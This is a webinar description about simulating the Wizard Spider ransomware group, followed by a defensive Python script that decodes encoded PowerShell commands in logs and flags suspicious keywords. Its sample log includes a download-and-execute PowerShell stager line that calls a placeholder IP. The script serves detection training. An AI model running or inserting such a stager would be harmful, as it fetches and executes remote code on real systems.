Red Team vs. Blue Team Intrusion Simulation Using Wizard Spider

The Wizard Spider cybercriminal group dates back to 2016, when it first started attacks with the Trickbot botnet. More recently, Wizard Spider has been seen leveraging Ryuk and Conti ransomware and has taken organizations for tens of millions of dollars. It has also recently been tied to a “cartel” made up of 3 other cybercriminal gangs, all sharing infrastructure, victim data and leak sites, and tactics. And just as the sharing of threat intel makes defenses stronger, this sharing of “anti-threat intelligence” of sorts means Wizard Spider and its cartel counterparts are only becoming more effective at their craft.

In this webinar, the Threat Research team at Immersive Labs runs a Red vs. Blue Adversary Simulation demonstrating what the Wizard Spider attackers do and, critically, how you can spot them through logs and some basic IR analysis.

  • Lead Threat Researcher, Alex Seymour, plays the role of Wizard Spider and uses an initial foothold to start exploring, exploiting, and pivoting through the network.
  • Director of Cyber Threat Research, Kev Breen, tracks what the attacker is doing before the inevitable ransomware arrives on the scene.
  • In this lively back-and-forth simulation, Alex works to exploit the network while Kev explains what each stage looks like in logs, using some basic IR skills like decoding PowerShell and more.
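The "decoding PowerShell" step Kev refers to is the kind of thing an analyst does over and over during triage: process-creation logs show `powershell.exe` launched with `-EncodedCommand` (or one of its accepted abbreviations such as `-e` or `-enc`), and the argument is base64 over UTF-16LE text. The script below is an added example written for this page, not code from Immersive Labs or from the webinar; it decodes that argument from constructed log lines, handles the malformed case, and surfaces a few indicator strings an analyst would want to see. The indicator list and the log-line format are assumptions made here for illustration, and the URL uses the reserved documentation range 192.0.2.0/24.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import List, Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, so match the
# forms that most often appear in logs: -e, -ec, -enc and the full switch name.
ENCODED_FLAG = re.compile(
    r"-e(?:c|nc|ncodedcommand)?\s+(?P<b64>[A-Za-z0-9+/=]{8,})", re.IGNORECASE
)

# Assumed indicator list: substrings in the decoded script worth surfacing to an analyst.
SUSPICIOUS = (
    "Invoke-Expression", "IEX", "DownloadString", "Net.WebClient",
    "FromBase64String", "-WindowStyle Hidden", "Bypass", "Invoke-WebRequest",
)


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it:
    UTF-16LE bytes, then standard base64. Used here only to construct test data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> Optional[str]:
    """Reverse of encode_command. Returns None when the argument is not valid
    base64 or does not decode as UTF-16LE, so a malformed value is flagged, not skipped."""
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


@dataclass
class Finding:
    line_no: int            # 1-based index into the log
    encoded: str            # the raw base64 argument as logged
    decoded: Optional[str]  # None when decoding failed
    indicators: List[str] = field(default_factory=list)


def triage(log_lines: List[str]) -> List[Finding]:
    """Return one Finding per log line that carries an encoded PowerShell command."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = ENCODED_FLAG.search(line)
        if not m:
            continue
        decoded = decode_encoded_command(m.group("b64"))
        hits = [s for s in SUSPICIOUS if decoded and s.lower() in decoded.lower()]
        findings.append(Finding(n, m.group("b64"), decoded, hits))
    return findings


# Constructed sample log: one benign service, one harmless encoded command, one
# download-and-execute stager, and one truncated (undecodable) argument.
BENIGN = "Get-Date"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage.ps1')"
SAMPLE_LOG = [
    "CommandLine: C:\\Windows\\System32\\svchost.exe -k netsvcs",
    f"CommandLine: powershell.exe -NoProfile -enc {encode_command(BENIGN)}",
    f"CommandLine: powershell.exe -nop -w hidden -e {encode_command(STAGER)}",
    "CommandLine: powershell.exe -EncodedCommand QUJDREVGR0g",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        status = "UNDECODABLE" if f.decoded is None else f.decoded
        print(f"line {f.line_no}: {status}")
        if f.indicators:
            print("  indicators:", ", ".join(f.indicators))
```

Run as-is and it reports line 2 as a plain `Get-Date`, line 3 with the `IEX`, `DownloadString` and `Net.WebClient` indicators, and line 4 as undecodable. A line that fails to decode is kept as a finding on purpose: in real logs that usually means the command line was truncated by the collector, which is itself worth a second look.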